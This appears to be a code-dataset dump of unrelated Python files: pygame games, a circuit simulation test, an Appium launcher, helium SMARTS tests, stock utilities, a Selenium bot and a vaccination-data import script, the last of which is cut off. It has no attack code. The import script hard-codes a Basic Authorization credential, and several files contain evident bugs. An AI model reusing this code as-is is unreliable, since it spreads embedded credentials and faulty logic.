pygame.K_e,\r\n 'r' : pygame.K_r,\r\n 't' : pygame.K_t,\r\n 'y' : pygame.K_y,\r\n 'u' : pygame.K_u,\r\n 'i' : pygame.K_i,\r\n 'o' : pygame.K_o,\r\n 'p' : pygame.K_p,\r\n 'a' : pygame.K_a,\r\n 's' : pygame.K_s,\r\n 'd' : pygame.K_d,\r\n 'f' : pygame.K_f,\r\n 'g' : pygame.K_g,\r\n 'h' : pygame.K_h,\r\n 'j' : pygame.K_j,\r\n 'k' : pygame.K_k,\r\n 'l' : pygame.K_l,\r\n 'z' : pygame.K_z,\r\n 'x' : pygame.K_x,\r\n 'c' : pygame.K_c,\r\n 'v' : pygame.K_v,\r\n 'b' : pygame.K_b,\r\n 'n' : pygame.K_n,\r\n 'm' : pygame.K_m}\r\n keys = list(keys_dict.keys())\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n global running\r\n running = False\r\n if event.type == pygame.KEYDOWN:\r\n for k in keys:\r\n if event.key == keys_dict[k]:\r\n events.append(k)\r\n if event.type == pygame.KEYUP:\r\n for k in keys:\r\n if event.key == keys_dict[k]:\r\n try:\r\n events.remove(k)\r\n except:\r\n pass\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n events.append('click')\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n try:\r\n events.remove('click')\r\n except:\r\n pass\r\n (mouse_x, mouse_y) = pygame.mouse.get_pos()\r\ndef display_wave():\r\n fg = 250, 240, 230\r\n bg = 5, 5, 5\r\n pygame.init()\r\n font1 = pygame.font.Font(None, 40)\r\n text1 = \"Wave: %s\" % wave_count\r\n text2 = \"Bad guys alive: %s\" % (len(bad_guys) + len(wave_to_do_list) + len(bombs))\r\n size1 = font1.size(text1)\r\n size2 = font1.size(text2)\r\n ren2 = font1.render(text2, 0, fg, bg)\r\n ren1 = font1.render(text1, 0, fg, bg)\r\n screen.blit(ren2, (0, 0))\r\n screen.blit(ren1, (1200, 0))\r\n \r\ndef create_players():\r\n global death_counts\r\n for x in reverse(list(range(preset[0]))):\r\n x = x + 1\r\n x_values = {1 : 700, 2 : 750, 3 : 800, 4 : 850}\r\n good_guys.append(player(x,preset.pop(-3),preset.pop(),x_values[x],350,preset.pop()))\r\n \r\n death_counts = True\r\n#(self, num, skin, cntr, x, y, gun)\r\n\r\n\r\ndef show_stats():\r\n create_text(100, 300, 200, 'Kills: %s' % kills)\r\n create_text(100, 300, 300, 'Damage: %s' % damage)\r\n create_text(100, 300, 400, 'Waves: %s' % wave)\r\n create_text(100, 300, 500, 'Time: %s:%s:%s' % (hours, minutes, seconds))\r\n if clicked(create_text(200, 900, 500, 'Done'), 900, 500):\r\n set_variables()\r\n elif 'space' in events:\r\n set_variables()\r\n \r\n \r\ndef display(image, x, y):\r\n offsetx = image.get_width() // 2\r\n offsety = image.get_height() // 2\r\n x2 = x - offsetx\r\n y2 = y - offsety\r\n screen.blit(image, (x - offsetx, y - offsety))\r\n origin = [x2, y2]\r\n return origin\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef main():\r\n global game_started, death_counts, counting\r\n screen.fill(screen_colour)\r\n search_events()\r\n if counting:\r\n stop_watch()\r\n if game_ready:\r\n if len(waves.keys()) < wave_count:\r\n if game_over_timer.count(240):\r\n screen.fill(screen_colour)\r\n counting = False\r\n create_text(100, 300, 0, 'You Win!')\r\n show_stats()\r\n if not game_started:\r\n counting = True\r\n start_game()\r\n game_started = True\r\n print('game started')\r\n for x in effects:\r\n x.loop()\r\n for y in balls:\r\n y.loop()\r\n for x in good_guys:\r\n x.loop()\r\n for p in bad_guys:\r\n if touching(x, p):\r\n x.hit()\r\n for p in balls:\r\n if touching(x, p):\r\n x.hit()\r\n for p in bad_bullets:\r\n if touching(x, p):\r\n x.hit()\r\n p.hit()\r\n for x in bad_guys:\r\n x.loop()\r\n for x in bombs:\r\n x.loop()\r\n for p in good_guys:\r\n if touching(p, x):\r\n print('oof')\r\n p.hit()\r\n x.trigger()\r\n if p.x > (x.x - bomb_stats['range']) and p.x < (x.x + bomb_stats['range']):\r\n if p.y > (x.y - bomb_stats['range']) and p.y < (x.y + bomb_stats['range']):\r\n print('in range')\r\n x.trigger()\r\n for p in good_bullets:\r\n if touching(p, x):\r\n p.hit()\r\n x.hit((bullets[p.bullet])[4])\r\n explosions.append(explosion(p.x - 20, p.y - 30))\r\n for x in good_bullets:\r\n x.loop()\r\n for p in bad_guys:\r\n if touching(x, p):\r\n explosions.append(explosion(x.x - 20, x.y - 30))\r\n x.hit()\r\n p.hit((bullets[x.bullet])[4])\r\n damage_((bullets[x.bullet])[4])\r\n for x in bad_bullets:\r\n x.loop()\r\n for x in explosions:\r\n x.loop()\r\n for x in time_outs:\r\n x.loop()\r\n if not game_on:\r\n start_button()\r\n if death_counts:\r\n if len(good_guys) == 0:\r\n game_over()\r\n if game_over_timer.count(240):\r\n print('game over')\r\n counting = False\r\n screen.fill(screen_colour)\r\n create_text(100, 300, 0, 'Game Over')\r\n show_stats()\r\n \r\n \r\n \r\n if game_on:\r\n# try:\r\n run_wave()\r\n# except:\r\n \r\n# if len(waves.keys()) < wave_count:\r\n# if game_over_timer.count(240):\r\n# screen.fill(screen_colour)\r\n# counting = False\r\n# create_text(100, 300, 0, 'You Win!')\r\n# show_stats()\r\n \r\n# else: \r\n# print('Error, run_wave Failed')\r\n if counting:\r\n display_wave()\r\n \r\n else:\r\n ask_player()\r\n pygame.display.update()\r\n clock.tick(fps)\r\n\r\n\r\n\r\n\r\ndef start_game():\r\n \r\n create_players()\r\n if scrolling_background:\r\n effects.append(stars())\r\n \r\n\r\n\r\ndef quit_game():\r\n pygame.quit()\r\n sys.exit()\r\n\r\ndef game_logic():\r\n if not debugging_mode:\r\n try:\r\n while running:\r\n main()\r\n quit_game()\r\n except:\r\n try:\r\n print('There has been an error in the game')\r\n quit_game()\r\n except:\r\n print('The game could not auto log-out. Press the minus sign if the game window is still open and exit out of the python shell')\r\n else:\r\n while running:\r\n main()\r\n quit_game() \r\n\r\n\r\n#setup functions\r\n\r\ndef get_angle(x,y,newx,newy):\r\n x1 = newx - x\r\n y1 = newy - y\r\n angle1 = math.degrees(math.atan(y1 / x1))\r\n if x1 > 0 and y1 > 0:\r\n angle2 = 360 - angle1\r\n print('quadrant 4')\r\n elif x1 > 0 and y1 < 0:\r\n print('quadrant 1')\r\n angle2 = angle1 * -1\r\n elif x1 < 0 and y1 > 0:\r\n print('quadrant 3')\r\n angle2 = (angle1 * -1) + 180\r\n elif x1 < 0 and y1 < 0:\r\n angle2 = 180 - 45\r\n print('quadrant 2')\r\n \r\n else:\r\n if x1 == 0:\r\n if y1 > 0:\r\n angle2 = 270\r\n if y1 < 0:\r\n angle2 = 90\r\n if y1 == 0:\r\n if x1 > 0:\r\n angle2 = 0\r\n if x1 < 0:\r\n angle2 = 180\r\n return angle2\r\n\r\n\r\n\r\ndef glide_to(x, y, newx, newy, speed):\r\n angle = get_angle(x,y,newx,newy)\r\n if range_(x, newx, speed * 1.5) and range_(y, newy, speed * 1.5):\r\n return [newx,newy,True]\r\n else:\r\n vals = move_forward(speed, angle)\r\n return [vals[0],vals[1],False]\r\n\r\ndef move_forward(speed,angle):\r\n y = (speed*math.sin(math.radians(angle)))\r\n x = (speed*math.cos(math.radians(angle)))\r\n return [x, -(y)]\r\n \r\ndef range_(num1, num2, val):\r\n if num1 > (num2 - val) and num1 < (num2 + val):\r\n return True\r\n\r\n\r\ndef round_(a):\r\n a = a // 1\r\n return a\r\n\r\n\r\n\r\ndef reverse(lst):\r\n return [ele for ele in reversed(lst)]\r\n\r\n#dumb game stuff\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nset_variables()\r\ngame_logic()\r\n","sub_path":"sadistic stars1.1/sadistic stars1.2.py","file_name":"sadistic stars1.2.py","file_ext":"py","file_size_in_byte":52259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404521339","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport setup\nfrom yalrf import YalRF\n\ny = YalRF('BJT AC Testbench')\n\nv1 = y.add_vdc('V1', 'nc', 'gnd', 1)\n\nc1 = y.add_capacitor('C1', 'ny', 'nb', 1e-6)\ni1 = y.add_iac('I1', 'ny', 'gnd', 1)\n\nl1 = y.add_inductor('L1', 'nx', 'nb', 1e-3)\nv2 = y.add_vdc('V2', 'nx', 'gnd', 0.75)\n\nq1 = y.add_bjt('Q1', 'nb', 'nc', 'gnd')\nq1.options['Is'] = 8.11e-14\nq1.options['Nf'] = 1\nq1.options['Nr'] = 1\nq1.options['Ikf'] = 0.5\nq1.options['Ikr'] = 0.225\nq1.options['Vaf'] = 113\nq1.options['Var'] = 24\nq1.options['Ise'] = 1.06e-11\nq1.options['Ne'] = 2\nq1.options['Isc'] = 0\nq1.options['Nc'] = 2\nq1.options['Bf'] = 205\nq1.options['Br'] = 4\n\nq1.options['Cje'] = 2.95e-11\nq1.options['Cjc'] = 1.52e-11\nq1.options['Cjs'] = 0.\n\ndc1 = y.add_dc_analysis('DC1')\nxdc = y.run('DC1')\n\nac1 = y.add_ac_analysis('AC1', start=10e6, stop=10e9, numpts=30, sweeptype='logarithm')\nxac = y.run('AC1', xdc)\n\nfreqs = y.get_freqs('AC1')\nvb = y.get_voltage('AC1', 'nb')\nvc = y.get_voltage('AC1', 'nc')\n\nib = i1.ac\nRin = 1. / np.real(ib / vb)\nCin = np.imag(ib / vb) / (2. * np.pi * freqs)\n\nplt.figure(figsize=(12,4))\n\nplt.subplot(121)\nplt.ticklabel_format(useOffset=False)\nplt.semilogx(freqs, Rin * 1e-6)\nplt.title('BJT AC Testbench')\nplt.xlabel('Frequency [Hz]')\nplt.ylabel('Rin [MOhms]')\nplt.grid()\n\nplt.subplot(122)\nplt.semilogx(freqs, Cin * 1e12)\nplt.title('BJT AC Testbench')\nplt.xlabel('Frequency [Hz]')\nplt.ylabel('Cin [pF]')\nplt.grid()\nplt.show()\n\n\n","sub_path":"tests/AC_BJT.py","file_name":"AC_BJT.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"193050623","text":"import subprocess\nfrom time import sleep\nimport os\n\n\ndef get_devices():\n output = subprocess.Popen('/home/alexz/Android/Sdk/platform-tools/adb devices', shell=True, stdout=subprocess.PIPE).communicate()[0]\n output = str(output).split('attached')[1]\n output = output.replace(\"\\\\n\", \"\").replace(\"\\\\r\", \"\")\n output = output.replace(\"\\\\t\", \"\")\n output = output.replace(\"'\", \"\")\n output = output.strip()\n output = output.split('device')\n output.pop()\n\n return output\n\n\nfile_with_hotels = 'hotels.txt'\n\n\ndef get_data_from_file(file):\n\n data = open(file, mode='r', encoding='UTF-8')\n read_data = data.read()\n data_without_str = read_data.replace('\"', \"\")\n hotels = data_without_str.split(',')\n data.close()\n\n return hotels\n\n\ndef start():\n devices = get_devices()\n print(devices)\n hotels = get_data_from_file(file_with_hotels)\n print(hotels)\n step = len(hotels)//len(devices)\n begin = 0\n end = step\n if devices:\n appium_port = 4725\n\n for device in devices:\n if device == (devices[0]):\n end = end + len(hotels) % len(devices)\n appium_port += 1\n\n os.system(\"gnome-terminal -e 'bash -c \\\"appium -p {appium_port} -U {device} \\\"'\"\\\n .format(device=device, appium_port=appium_port))\n sleep(10)\n os.system(\"gnome-terminal -e 'bash -c \\\"python tripatvisor_get_info.py {appium_port} {begin} {end}\\\"'\"\\\n .format(appium_port=appium_port, begin=begin, end=end))\n hotels = get_data_from_file(file_with_hotels)\n print(hotels[begin:end])\n print(device)\n print(appium_port)\n print(begin)\n print(end)\n begin = end\n end += step\n\n\n # os.system(\"gnome-terminal -e 'bash -c \\\"appium -p 4723 -U emulator-5556 \\\"'\")\n\nstart()\n\n\n\n\n\n\n\n\n\n\n # os.system(\"gnome-terminal -e 'bash -c \\\"appium -p 4722 -U emulator-5554 \\\"'\")\n #\n # os.system(\"gnome-terminal -e 'bash -c \\\"appium -p 4723 -U emulator-5556 \\\"'\")\n # sleep(10)\n # os.system(\"gnome-terminal -e 'bash -c \\\"python tripatvisor_get_info.py 4722\\\"'\")\n # os.system(\"gnome-terminal -e 'bash -c \\\"python tripatvisor_get_info.py 4723\\\"'\")\n\n\n\n\n\n # subprocess.Popen(['gnome-terminal', 'appium -p 4722 -U emulator-5554 -bp 5232'], shell=True)\n # subprocess.Popen('appium -p 4722 -U emulator-5554 -bp 5232', shell=True)\n # subprocess.Popen('gnome-terminal', shell=True)\n # subprocess.Popen('appium -p 4723 -U emulator-5556 -bp 5234', shell=True)\n\n\n\n\n\n","sub_path":"project_test_file/onetime.py","file_name":"onetime.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"273864908","text":"import tkinter\r\nfrom tkinter import messagebox\r\n\r\ndef btn1clicked():\r\n\tmessagebox.showinfo(title = \"Btn1\", detail = \"btn1 clicked\")\r\n\r\nmywin = tkinter.Tk()\r\nmyframe = tkinter.Frame(mywin)\r\nmyframe.pack()\r\nbutton1 = tkinter.Button(text=\"click1\", padx = 25, pady = 10, command = btn1clicked)\r\nbutton1.grid(in_=myframe, row = 0, column = 0, padx =25, pady=10)\r\n\r\nbutton2 = tkinter.Button(myframe , text = \"====button2====\")\r\nbutton2.grid(row = 1, column = 1)\r\n\r\nbutton3 = tkinter.Button(myframe, text = \"button3\")\r\nbutton3.grid(row = 2, column = 1, sticky = 'we')\r\nmywin.mainloop()","sub_path":"courses/w04_py/source/s05/gui/mygrid1.py","file_name":"mygrid1.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515201270","text":"import helium\nimport unittest\n\nSMILES = helium.Smiles()\n\nclass TestSmarts(unittest.TestCase):\n\n def test_valid_smarts(self):\n smarts = helium.Smarts()\n self.assertTrue(smarts.init('C'))\n self.assertFalse(smarts.error().__nonzero__())\n self.assertEqual(0, len(str(smarts.error())))\n\n def test_invalid_smarts(self):\n smarts = helium.Smarts()\n self.assertFalse(smarts.init('fdsgsgd'))\n self.assertTrue(smarts.error().__nonzero__())\n self.assertNotEqual(0, len(str(smarts.error())))\n\n def test_find_no_mapping_hit(self):\n smarts = helium.Smarts()\n smarts.init('C')\n\n mol = helium.Molecule()\n SMILES.read('CCC', mol)\n\n mapping = helium.NoMapping()\n rings = helium.RingSet(mol)\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping))\n self.assertTrue(mapping.match)\n\n def test_find_no_mapping_miss(self):\n smarts = helium.Smarts()\n smarts.init('N')\n\n mol = helium.Molecule()\n SMILES.read('CCC', mol)\n\n mapping = helium.NoMapping()\n rings = helium.RingSet(mol)\n\n self.assertFalse(smarts.findMapping(mol, rings, mapping))\n self.assertFalse(mapping.match)\n\n def test_find_count_mapping(self):\n smarts = helium.Smarts()\n smarts.init('C')\n\n mol = helium.Molecule()\n SMILES.read('CCC', mol)\n\n mapping = helium.CountMapping()\n rings = helium.RingSet(mol)\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping))\n self.assertEqual(3, mapping.count)\n\n def test_find_single_mapping(self):\n smarts = helium.Smarts()\n smarts.init('c1ccccc1')\n\n mol = helium.Molecule()\n SMILES.read('c1ccccc1-c2ccccc2', mol)\n\n mapping = helium.SingleMapping()\n rings = helium.RingSet(mol)\n\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping))\n self.assertEqual(6, len(mapping.map))\n\n def test_find_mapping_list(self):\n smarts = helium.Smarts()\n smarts.init('c1ccccc1')\n\n mol = helium.Molecule()\n SMILES.read('c1ccccc1-c2ccccc2', mol)\n\n mapping = helium.MappingList()\n rings = helium.RingSet(mol)\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping))\n self.assertEqual(2, len(mapping.maps))\n self.assertEqual(6, len(mapping.maps[0]))\n self.assertEqual(6, len(mapping.maps[1]))\n\n def test_find_unqiue(self):\n smarts = helium.Smarts()\n smarts.init('C.C')\n\n mol = helium.Molecule()\n SMILES.read('C.C', mol)\n\n mapping = helium.MappingList()\n rings = helium.RingSet(mol)\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping))\n self.assertEqual(1, len(mapping.maps))\n self.assertEqual(2, len(mapping.maps[0]))\n\n self.assertTrue(smarts.findMapping(mol, rings, mapping, False))\n self.assertEqual(3, len(mapping.maps))\n self.assertEqual(2, len(mapping.maps[0]))\n self.assertEqual(2, len(mapping.maps[1]))\n self.assertEqual(2, len(mapping.maps[2]))\n\n def test_requires_ring_set(self):\n smarts = helium.Smarts()\n\n smarts.init('C')\n self.assertFalse(smarts.requiresRingSet())\n\n smarts.init('[Nr5]')\n self.assertTrue(smarts.requiresRingSet())\n\n def test_requires_explicit_hydrogens(self):\n smarts = helium.Smarts()\n\n smarts.init('C')\n self.assertFalse(smarts.requiresExplicitHydrogens())\n\n smarts.init('[C]([H])')\n self.assertTrue(smarts.requiresExplicitHydrogens())\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/python/smarts.py","file_name":"smarts.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"311826240","text":"import math\r\nimport random\r\nimport time\r\n\r\nimport pygame\r\n\r\npygame.init()\r\n\r\n#vars\r\nclock = pygame.time.Clock()\r\nshipImg = pygame.image.load(\"spaceship.png\")\r\n\r\ndisplay_width = 800\r\ndisplay_height = 450\r\nx = (display_width * 0.45)\r\ny = (display_height * 0.6)\r\nx_change = 0\r\nship_speed = 0\r\nship_width = 106\r\n#display, name\r\n\r\n\r\ngameDisplay = pygame.display.set_mode((display_width,display_height))\r\n\r\npygame.display.set_caption(\"test\")\r\n\r\n#colors\r\nblack = (0,0,0)\r\nwhite = (255, 255, 255)\r\ncyan = (0, 255, 255)\r\nlime = (0, 255, 64)\r\n\r\n#funcs\r\ndef ship(x,y):\r\n gameDisplay.blit(shipImg, (x,y))\r\n\r\ndef things_dodged(count):\r\n font = pygame.font.SysFont(None, 25)\r\n text = font.render(\"Dodged: \"+str(count), True, white)\r\n gameDisplay.blit(text,(0,0))\r\n\r\ndef crash():\r\n message_display(\"You Crashed\")\r\n\r\ndef text_objects(text, font):\r\n textSurface = font.render(text, True, white)\r\n return textSurface, textSurface.get_rect()\r\n\r\ndef obstacle(objectX, objectY): #, objectW, objectH, color):\r\n gameDisplay.blit(pygame.image.load(\"asteroid.png\"), (objectX,objectY)) #pygame.draw.rect(gameDisplay, color, [objectX, objectY, objectW, objectH])\r\n\r\ndef message_display(text):\r\n largeText = pygame.font.Font(\"freesansbold.ttf\",115)\r\n TextSurf, TextRect = text_objects(text, largeText)\r\n TextRect.center = ((display_width/2),(display_height/2))\r\n gameDisplay.blit(TextSurf, TextRect)\r\n pygame.display.update()\r\n time.sleep(2)\r\n game_loop()\r\n \r\ndef game_loop():\r\n x = (display_width * 0.45)\r\n y = (display_height * 0.6)\r\n\r\n x_change = 0\r\n\r\n #obstacle handling\r\n obstacle_startX = random.randrange(0, display_width)\r\n obstacle_startY = -600\r\n obstacle_speed = 7\r\n objectW = 100\r\n objectH = 100\r\n\r\n gameExit = False\r\n\r\n while not gameExit: #while gameExit\r\n\r\n for event in pygame.event.get():\r\n print(event.type)\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n x_change = -7\r\n if event.key == pygame.K_RIGHT:\r\n x_change = 7\r\n\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n x_change = 0\r\n\r\n x += x_change\r\n\r\n gameDisplay.fill(black)\r\n ship(x,y)\r\n\r\n #obstacle spawning\r\n obstacle(obstacle_startX, obstacle_startY)#, objectW, objectH, cyan) #(random.randint(0,255),random.randint(0,255),random.randint(0,255)))\r\n obstacle_startY += obstacle_speed\r\n ship(x,y)\r\n\r\n if x > display_width - ship_width or x < 0:\r\n crash()\r\n\r\n #if obstacle_startY > display_height:\r\n #obstacle_startY = 0 - objectH\r\n #obstacle_startX = random.randrange(0,display_width)\r\n\r\n if obstacle_startY == 0 - objectH:\r\n obstacle_startY = 0 - objectH\r\n obstacle_startX = random.randrange(0,display_width)\r\n dodged +=1\r\n obstacle_speed += 1\r\n objectW += (dodged *1.2)\r\n\r\n #collision handling\r\n if y < obstacle_startY + 50:\r\n print('Y Crossover')\r\n\r\n if x > obstacle_startX and x < obstacle_startX + 50 or x + 106 > obstacle_startX and x + 106 < obstacle_startX + 50:\r\n print(\"X Crossover, confirmed crash\")\r\n crash()\r\n \r\n pygame.display.update()\r\n clock.tick(60)\r\n\r\ngame_loop()\r\n\r\npygame.quit()\r\nquit()\r\n","sub_path":"Seniors/platformertest.py","file_name":"platformertest.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"209778837","text":"# -*- coding: UTF-8 -*-\nimport datetime\nfrom pandas.tseries.offsets import *\n\nimport xlrd\nimport pandas as pd\nimport os\nimport time\n\nDATA_DIR = 'data'\nONE_HOUR_SECONDS = 60 * 60\n\n\n# 获取股票代码列表\ndef get_stocks(config=None):\n if config:\n data = xlrd.open_workbook(config)\n table = data.sheets()[0]\n rows_count = table.nrows\n codes = table.col_values(0)[1:rows_count-1]\n names = table.col_values(1)[1:rows_count-1]\n return list(zip(codes, names))\n else:\n data_files = os.listdir(DATA_DIR)\n stocks = []\n for file in data_files:\n code_name = file.split(\".\")[0]\n code = code_name.split(\"-\")[0]\n name = code_name.split(\"-\")[1]\n appender = (code, name)\n stocks.append(appender)\n return stocks\n\n\n# 读取本地数据文件\ndef read_data(code_name):\n stock = code_name[0]\n name = code_name[1]\n file_name = stock + '-' + name + '.h5'\n try:\n return pd.read_hdf(DATA_DIR + \"/\" + file_name)\n except FileNotFoundError:\n return\n\n\n# 是否需要更新数据\ndef need_update_data():\n try:\n code_name = ('000001', '平安银行')\n data = read_data(code_name)\n if data.empty:\n return True\n else:\n start_time = next_weekday(data.iloc[-1].date)\n current_time = datetime.datetime.now()\n if start_time > current_time:\n return False\n except FileNotFoundError:\n return True\n\n\n# 是否是工作日\ndef is_weekday():\n return datetime.datetime.today().weekday() < 5\n\n\ndef next_weekday(date):\n return pd.to_datetime(date) + BDay()\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"75700357","text":"#!path+=**/Python/3.7/bin:Google\\ Chrome.app/Contents/MacOS\n# Please download\n# geckodriver from, This is a macos download link straight to the zip\n# https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-macos.tar.gz\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport selenium.webdriver.chrome.service as service\n\nimport time\n\n\nclass GoogleBot:\n def __init__(self, search_item):\n self.bot = service.Service(\n '**/Applications/Google\\ Chrome.app/Contents/MacOS')\n self.search = search_item\n\n def search(self):\n search_input = self.search\n bot = self.bot\n bot.start()\n capabilities = {\n 'chrome.binary': '**/Google\\ Chrome\\ Canary.app/Contents/MacOS'}\n driver = webdriver.Remote(service.service_url, capabilities)\n driver.get('http://www.google.com/xhtml')\n time.sleep(5)\n # searchbar = bot.find_element_by_class_name(\"gLFyfgsfi\")\n # searchbar.clear()\n # searchbar.send_keys(search_input)\n\n\ngs = GoogleBot(\"NBA\")\ngs.search()\n\n","sub_path":"twitter-bot-python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"99994774","text":"import pandas as pd\r\nimport database as db\r\nimport math\r\nimport time\r\nimport traceback\r\nfrom datetime import datetime\r\nimport requests\r\nimport json\r\nfrom datetime import date\r\nimport pandas as pd\r\n\r\n\r\nstart = time.time()\r\ndb.execute('SET GLOBAL innodb_lock_wait_timeout = 5000;')\r\ndb.execute('SET innodb_lock_wait_timeout = 5000;')\r\n\r\n# TODO: importar dados corretamente\r\n# TODO: criar o MER\r\n# TODO: criar um front?\r\n# TODO: documentar processo e obstaculos\r\n\r\n# Get incoming data\r\n#variável utilizada quando usamos CSV\r\npath=r'C:\\Users\\Victor\\Documents\\Periodo 2020.2\\Bioinformática\\part-00000-8feada9c-2005-4fe0-b2a5-9f51647d7637.c000 - Copia.csv'\r\n\r\n\r\nurl = \"https://imunizacao-es.saude.gov.br/_search\"\r\ndata_hoje = str(date.today())\r\npayload = json.dumps({\r\n \"size\": 10000, # máximo de registros em uma query \r\n\"query\": {\r\n \"bool\" : {\r\n \"must\" : {\r\n \"match\": {\"estabelecimento_uf\": \"ac\"}\r\n },\r\n \"filter\": {\r\n \"range\" : {\r\n \"vacina_dataAplicacao\" : {\r\n \"gte\": \"2021-05-13\",\r\n \"lte\": data_hoje,\r\n \"format\": \"yyyy-MM-dd\"\r\n }\r\n }\r\n }\r\n }\r\n}\r\n#,\r\n# \"fields\": [\r\n# \"vacina_dataAplicacao\",\r\n# \"estabelecimento_uf\"\r\n# ],\r\n# \"_source\": False\r\n}\r\n\r\n)\r\nheaders = {\r\n 'Authorization': 'Basic aW11bml6YWNhb19wdWJsaWM6cWx0bzV0JjdyX0ArI1Rsc3RpZ2k=',\r\n 'Content-Type': 'application/json',\r\n 'Cookie': 'ELASTIC-PROD=1621895938.823.19618.765660'\r\n}\r\n\r\n\r\nresponse = requests.request(\"POST\", url, headers=headers, data=payload)\r\nres = response.json()\r\nres = res['hits']['hits']\r\nlista = list()\r\n#colocando todos os registros em uma lista para transformar em dataframe\r\nfor i in res:\r\n lista.append(i['_source'])\r\ndata = pd.json_normalize(lista)\r\n\r\n#transformando nomes das colunas em minusculas \r\ncolumn_name = list()\r\nfor col in data.columns:\r\n column_name.append(col.lower())\r\n\r\ndata.columns = column_name \r\n\r\n#data = pd.read_csv(path, delimiter=\";\", encoding='utf8')\r\n\r\n# Renomeia colunas utilizadas\r\ncols = {\r\n 'document_id': 'id',\r\n 'paciente_id': 'paciente_id', \r\n 'paciente_datanascimento': 'paciente_data_nascimento', \r\n 'paciente_enumsexobiologico': 'paciente_sexo', \r\n 'paciente_enumSexoBiologico': 'paciente_sexo', \r\n 'paciente_racacor_codigo': 'paciente_raca_codigo', \r\n 'paciente_racaCor_codigo' : 'paciente_raca_codigo', \r\n 'paciente_racacor_valor': 'paciente_raca_nome', \r\n 'paciente_racaCor_valor' : 'paciente_raca_nome', \r\n 'paciente_endereco_coibgemunicipio': 'paciente_municipio_codigo', \r\n 'paciente_endereco_nmmunicipio': 'paciente_municipio_nome', \r\n 'paciente_endereco_copais': 'paciente_pais_codigo',\r\n 'paciente_endereco_coPais': 'paciente_pais_codigo',\r\n 'paciente_endereco_nmpais': 'paciente_pais_nome',\r\n 'paciente_endereco_nmPais': 'paciente_pais_nome',\r\n 'paciente_endereco_uf': 'paciente_estado',\r\n 'paciente_endereco_cep': 'paciente_cep',\r\n 'paciente_nacionalidade_enumnacionalidade': 'paciente_nacionalidade',\r\n 'paciente_nacionalidade_enumNacionalidade': 'paciente_nacionalidade',\r\n 'estabelecimento_valor': 'estabelecimento_codigo',\r\n 'estabelecimento_razaosocial': 'estabelecimento_razao_social',\r\n 'estalecimento_nofantasia': 'estabelecimento_nome',\r\n 'estabelecimento_municipio_codigo': 'estabelecimento_municipio_codigo',\r\n 'estabelecimento_municipio_nome': 'estabelecimento_municipio_nome',\r\n 'estabelecimento_uf': 'estabelecimento_estado',\r\n 'vacina_grupoatendimento_codigo': 'grupo_atendimento_codigo',\r\n 'vacina_grupoatendimento_nome': 'grupo_atendimento_nome',\r\n 'vacina_categoria_codigo': 'vacina_categoria_codigo',\r\n 'vacina_categoria_nome': 'vacina_categoria_nome',\r\n 'vacina_lote': 'vacina_lote',\r\n 'vacina_fabricante_nome': 'fabricante_nome',\r\n 'vacina_fabricante_referencia': 'fabricante_referencia',\r\n 'vacina_dataaplicacao': 'data_aplicacao',\r\n 'vacina_descricao_dose': 'descricao_dose',\r\n 'vacina_codigo': 'vacina_codigo',\r\n 'vacina_nome': 'vacina_nome',\r\n 'sistema_origem': 'sistema_origem',\r\n 'data_importacao_rnds': 'data_importacao_rnds'\r\n}\r\n\r\n# Remove colunas não utilizadas\r\nnon_used_columns = list(set(data.columns) - set(cols.keys()))\r\ndata = data.drop(columns=non_used_columns)\r\ndata.rename(columns=cols, inplace=True)\r\n#data.to_csv(\"output_1.csv\",sep=\";\")\r\n\r\ndef format_date(date_str):\r\n try:\r\n if(len(date_str) < 6):\r\n raise Exception()\r\n return f\"'{date_str}'\"\r\n except Exception as e:\r\n return 'NULL'\r\n\r\n\r\n# Pega dados no banco de dados, serão usados para atribuir as chaves estrangeiras\r\nprint('Fetching database data.')\r\npacientes_db = db.query('SELECT id, sexo_id FROM pacientes').set_index('id')\r\nracas_db = db.query('SELECT id, nome FROM racas').set_index('id')\r\nsexos_db = db.query('SELECT id, codigo FROM sexos').set_index('codigo')\r\nnacionalidades_db = db.query('SELECT id, codigo FROM nacionalidades').set_index('codigo')\r\npaises_db = db.query('SELECT id, codigo FROM 